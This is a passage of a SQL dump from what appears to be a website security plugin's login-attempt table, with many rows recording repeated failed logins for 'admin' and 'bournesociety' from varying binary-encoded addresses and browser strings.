Firefox/62.0'),(5659,9255,1629845080.734602,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-wS�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5660,9260,1629846092.300399,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5661,9261,1629846442.491558,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g|]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5662,9268,1629848928.935458,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5663,9270,1629849663.850066,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-wT�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5664,9271,1629850018.680282,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5665,9272,1629850359.209907,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���AA�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5666,9276,1629851813.161321,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5667,9277,1629852222.397330,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5668,9277,1629852222.502859,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5669,9279,1629852941.975971,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5670,9282,1629854089.157251,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5671,9282,1629854089.166190,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5672,9283,1629854463.158068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5673,9287,1629855720.018925,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0'),(5674,9288,1629856015.552465,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ғ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5675,9294,1629857591.059515,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5676,9296,1629858415.142891,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5677,9298,1629859059.800644,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5678,9299,1629859161.509896,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5679,9300,1629859532.062024,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@rA','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5680,9301,1629859956.233342,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��;u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5681,9305,1629861984.267437,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\r\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5682,9306,1629862351.211005,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5683,9311,1629863569.067815,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����kQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5684,9312,1629863607.220561,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),(5685,9313,1629864001.419904,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5686,9314,1629864400.717720,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5687,9315,1629864821.757894,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5688,9317,1629865652.408985,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5689,9318,1629866073.915866,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5690,9319,1629866514.335900,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5691,9321,1629867271.836797,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5692,9323,1629867831.321786,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��؉��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5693,9325,1629868302.937468,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��؞��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5694,9326,1629868509.261008,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5695,9327,1629868717.225419,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5696,9328,1629868955.740858,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n5	','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5697,9329,1629869165.127783,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5698,9330,1629869302.610060,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5699,9331,1629869381.639598,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ٓ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5700,9333,1629869596.455891,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5701,9334,1629871308.695519,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��S�\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5702,9335,1629871484.026970,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/jɆ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5703,9336,1629871711.839152,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5704,9337,1629871912.057284,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h%��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5705,9338,1629872103.687382,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gzj�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5706,9339,1629872328.780123,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5707,9340,1629872525.906995,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5708,9341,1629872739.515022,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5709,9342,1629872938.754762,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A<\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5710,9343,1629873130.595249,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��{��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5711,9344,1629873354.427102,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5712,9345,1629873536.366759,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5713,9345,1629873536.412219,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5714,9346,1629873722.317951,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5715,9347,1629873942.452297,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>	z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5716,9348,1629874108.663047,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(5717,9349,1629874123.736666,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5718,9350,1629874334.647238,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@v�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5719,9351,1629874453.213033,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���nUD','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5720,9352,1629874563.479383,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�X)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5721,9352,1629874563.521547,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�X)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5722,9353,1629874767.193545,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P��o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5723,9355,1629875154.527491,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gmш','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5724,9356,1629875358.706629,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5725,9358,1629875969.032672,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���츈','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5726,9364,1629877279.767826,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5727,9365,1629877334.933429,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ѐ&','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5728,9366,1629877481.748715,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���AA�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5729,9367,1629877717.538018,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5730,9369,1629878218.379582,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5731,9370,1629878459.140184,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[L=','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5732,9372,1629878939.745223,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5733,9375,1629879651.325821,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}:w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5734,9376,1629879693.493538,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(5735,9377,1629879918.400644,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xc�/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5736,9379,1629880401.334800,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5737,9381,1629880905.206654,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5738,9383,1629881412.167558,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��M\'f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5739,9384,1629881644.585960,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5740,9386,1629882161.513666,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5741,9388,1629882710.745055,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5742,9390,1629883243.050476,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5743,9392,1629883732.799065,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5744,9393,1629884030.314052,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5745,9394,1629884309.031627,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5746,9395,1629884352.372965,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(5747,9397,1629884703.233068,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�J','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5748,9400,1629885810.012674,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5749,9407,1629888093.205486,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@v�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5750,9408,1629888425.467189,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5751,9409,1629888713.266130,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B!�l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5752,9411,1629889289.835758,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5753,9412,1629889581.395230,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5754,9416,1629890462.012798,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5755,9416,1629890462.040085,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5756,9417,1629890690.404348,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Bs�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5757,9418,1629890981.844633,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5758,9419,1629891282.596453,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5759,9420,1629891553.380591,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��xO�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5760,9423,1629892481.119416,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5761,9424,1629892785.100892,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5762,9425,1629893100.182684,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5763,9426,1629893411.180440,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5764,9428,1629894044.112645,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5765,9429,1629894109.137877,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(5766,9430,1629894373.663976,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5767,9431,1629894672.554708,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��؉��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5768,9432,1629894981.650627,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QDD�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5769,9434,1629895621.726822,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5770,9434,1629895621.745764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5771,9435,1629895911.609901,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���AA�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5772,9436,1629896264.239302,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5773,9437,1629896582.048536,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\rQ(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5774,9438,1629896923.867024,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5775,9439,1629897233.712550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5776,9439,1629897233.748751,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5777,9442,1629898191.219695,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���B�r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5778,9442,1629898191.236783,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���B�r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5779,9443,1629898524.310393,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5780,9444,1629898845.740058,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5781,9444,1629898845.784585,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5782,9445,1629899491.771068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_pO','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5783,9446,1629899802.168065,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ár�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5784,9449,1629900455.373792,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5785,9449,1629900455.471830,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5786,9450,1629900816.782338,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���S��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5787,9452,1629901462.574596,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5788,9452,1629901462.615917,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 